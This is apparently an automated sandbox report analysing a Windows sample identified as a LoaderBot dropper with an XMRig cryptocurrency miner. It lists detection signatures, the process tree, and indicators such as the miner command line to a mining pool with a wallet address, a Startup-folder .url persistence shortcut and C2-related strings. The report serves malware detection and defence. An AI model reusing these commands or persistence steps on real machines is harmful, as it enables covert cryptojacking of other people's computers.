Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01904399.dat.exe

Overview

General Information

Sample Name:01904399.dat.exe
Analysis ID:876764
MD5:33b4baef7b0a6ad57a7d30af324c4efd
SHA1:b169a559615a8448d7ed7da56d36a6850d2092e2
SHA256:3a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
Tags:CoinMiner
Infos:

Detection

LoaderBot, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Yara detected LoaderBot
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Detected Stratum mining protocol
Machine Learning detection for sample
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 01904399.dat.exe (PID: 5684 cmdline: C:\Users\user\Desktop\01904399.dat.exe MD5: 33B4BAEF7B0A6AD57A7D30AF324C4EFD)
    • Driver.exe (PID: 4628 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 01904399.dat.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe" MD5: 33B4BAEF7B0A6AD57A7D30AF324C4EFD)
  • 01904399.dat.exe (PID: 4676 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe" MD5: 33B4BAEF7B0A6AD57A7D30AF324C4EFD)
  • 01904399.dat.exe (PID: 676 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe" MD5: 33B4BAEF7B0A6AD57A7D30AF324C4EFD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
01904399.dat.exeJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
    01904399.dat.exeMALWARE_Win_CoinMiner04Detects coinmining malwareditekSHen
    • 0x3f5535:$s1: createDll
    • 0x3f5821:$s2: getTasks
    • 0x3f568f:$s3: SetStartup
    • 0x3f5563:$s4: loadUrl
    • 0x3f5712:$s5: Processer
    • 0x3f588e:$s6: checkProcess
    • 0x3f589b:$s7: runProcess
    • 0x3f573a:$s8: createDir
    • 0x3f5a4f:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
    • 0x3f5ae3:$cnc2: ?hwid=
    • 0x3f5b13:$cnc3: ?timeout=1
    • 0x3f5c45:$cnc4: &completed=
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlURL_File_Local_EXEDetects an .url file that points to a local executableFlorian Roth (Nextron Systems)
      • 0x0:$s1: [InternetShortcut]
      • 0x14:$s2: URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
      • 0x14:$file: URL=file:///
      • 0x0:$url_explicit: [InternetShortcut]
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.822561306.0000000000510000.00000004.00000020.00020000.00000000.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
      • 0x34a4:$s03: -o pool.
      00000002.00000002.823432979.000001C49DE04000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000001.00000002.822561306.000000000053B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000000.00000000.551027505.00000000005FC000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
            00000001.00000002.822561306.0000000000518000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              0.0.01904399.dat.exe.380000.0.unpackJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
                0.0.01904399.dat.exe.380000.0.unpackMALWARE_Win_CoinMiner04Detects coinmining malwareditekSHen
                • 0x3f5535:$s1: createDll
                • 0x3f5821:$s2: getTasks
                • 0x3f568f:$s3: SetStartup
                • 0x3f5563:$s4: loadUrl
                • 0x3f5712:$s5: Processer
                • 0x3f588e:$s6: checkProcess
                • 0x3f589b:$s7: runProcess
                • 0x3f573a:$s8: createDir
                • 0x3f5a4f:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                • 0x3f5ae3:$cnc2: ?hwid=
                • 0x3f5b13:$cnc3: ?timeout=1
                • 0x3f5c45:$cnc4: &completed=

                Bitcoin Miner

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: C:\Users\user\Desktop\01904399.dat.exe, ParentImage: C:\Users\user\Desktop\01904399.dat.exe, ParentProcessId: 5684, ParentProcessName: 01904399.dat.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, ProcessId: 4628, ProcessName: Driver.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\01904399.dat.exe, ProcessId: 5684, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 01904399.dat.exeReversingLabs: Detection: 81%
                Source: 01904399.dat.exeVirustotal: Detection: 77%Perma Link
                Source: 01904399.dat.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeVirustotal: Detection: 70%Perma Link
                Source: 01904399.dat.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000002.00000002.823432979.000001C49DE04000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.822561306.000000000053B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.822561306.0000000000518000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 01904399.dat.exe PID: 5684, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 4628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5468, type: MEMORYSTR
                Source: 01904399.dat.exe, 00000000.00000000.551027505.0000000000382000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: @cryptonight/0cn
                Source: conhost.exe, 00000002.00000002.823454090.000001C49E130000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: XMRig 6.2.2sv
                Source: global trafficTCP traffic: 192.168.2.4:49694 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"427x8gux5jrrgk4v7grcwk85mwpjcan7djgqbabcetdqc5bivy27pept3ctx43qmladkaardf4kw4hiozmdq7ehrnczdnfm","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                Source: 01904399.dat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 01904399.dat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_00FCBAA8
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then jmp 00FC0FA9h0_2_00FC0E48
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then jmp 00FC2A7Eh0_2_00FC2613
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_00FC08E0
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_00FC018C
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_00FC0189
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_00FCBA9D
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_00FCC3C8
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_00FCC3BD
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00FC452C
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00FC652D
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h3_2_0147B398
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 014726B6h3_2_0147224B
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_0147018C
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_014708E0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h3_2_0147B38D
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_014732D0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h3_2_0147BCAD
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h3_2_0147BCB8
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 01470FA9h3_2_01470E48
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 01470FA9h3_2_01470E58
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_01475E1C
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 00F524F6h4_2_00F5208B
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h4_2_00F5B398
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_00F508E0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_00F5018C
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_00F50189
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_00F532D0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h4_2_00F5B38D
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h4_2_00F5BCB8
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h4_2_00F5BCAD
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 00F50FA9h4_2_00F50E48
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_00F55E1C
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 02FD24F6h5_2_02FD208B
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then jmp 02FD0FA9h5_2_02FD0E48
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_02FD08E0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_02FD018C
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_02FD0189
                Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                Source: Joe Sandbox ViewIP Address: 141.94.96.71 141.94.96.71
                Source: global trafficTCP traffic: 192.168.2.4:49694 -> 141.94.96.71:3333
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: 01904399.dat.exe, Driver.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: unknownDNS traffic detected: queries for: pool.supportxmr.com
                Source: 01904399.dat.exe, 00000000.00000002.588365499.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 01904399.dat.exe, type: SAMPLEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 0.0.01904399.dat.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 01904399.dat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 01904399.dat.exe, type: SAMPLEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                Source: 0.0.01904399.dat.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                Source: 00000001.00000002.822561306.0000000000510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
                Source: Process Memory Space: 01904399.dat.exe PID: 5684, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
                Source: Process Memory Space: Driver.exe PID: 4628, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPEDMatched rule: URL_File_Local_EXE date = 2017-10-04, author = Florian Roth (Nextron Systems), description = Detects an .url file that points to a local executable, score = , reference = https://twitter.com/malwareforme/status/915300883012870144, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FC2AE80_2_00FC2AE8
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FCAFD00_2_00FCAFD0
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FCC7880_2_00FCC788
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FCA1A00_2_00FCA1A0
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FC2AD90_2_00FC2AD9
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FC9C500_2_00FC9C50
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 3_2_0147A8C03_2_0147A8C0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 3_2_014727203_2_01472720
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 3_2_01479A903_2_01479A90
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 3_2_014795403_2_01479540
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 3_2_0147270F3_2_0147270F
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4_2_00F5A8C04_2_00F5A8C0
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4_2_00F525604_2_00F52560
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4_2_00F59A904_2_00F59A90
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4_2_00F595404_2_00F59540
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 4_2_00F5254F4_2_00F5254F
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 5_2_02FD25605_2_02FD2560
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeCode function: 5_2_02FD254F5_2_02FD254F
                Source: 01904399.dat.exe, 00000000.00000000.553802307.000000000077A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename0 vs 01904399.dat.exe
                Source: 01904399.dat.exe, 00000000.00000002.588365499.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe
                Source: 01904399.dat.exe, 00000003.00000002.645598292.00000000010EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe
                Source: 01904399.dat.exe, 00000004.00000002.714201052.0000000000DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe
                Source: 01904399.dat.exe, 00000005.00000002.647446627.000000000139A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe
                Source: 01904399.dat.exeBinary or memory string: OriginalFilename0 vs 01904399.dat.exe
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                Source: 01904399.dat.exeReversingLabs: Detection: 81%
                Source: 01904399.dat.exeVirustotal: Detection: 77%
                Source: 01904399.dat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\01904399.dat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\01904399.dat.exe C:\Users\user\Desktop\01904399.dat.exe
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe"
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeFile created: C:\Users\user\AppData\Roaming\SysfilesJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.mine.winEXE@7/2@1/1
                Source: C:\Users\user\Desktop\01904399.dat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: 01904399.dat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\01904399.dat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: 01904399.dat.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: 01904399.dat.exeStatic file information: File size 4156928 > 1048576
                Source: 01904399.dat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 01904399.dat.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3f6400
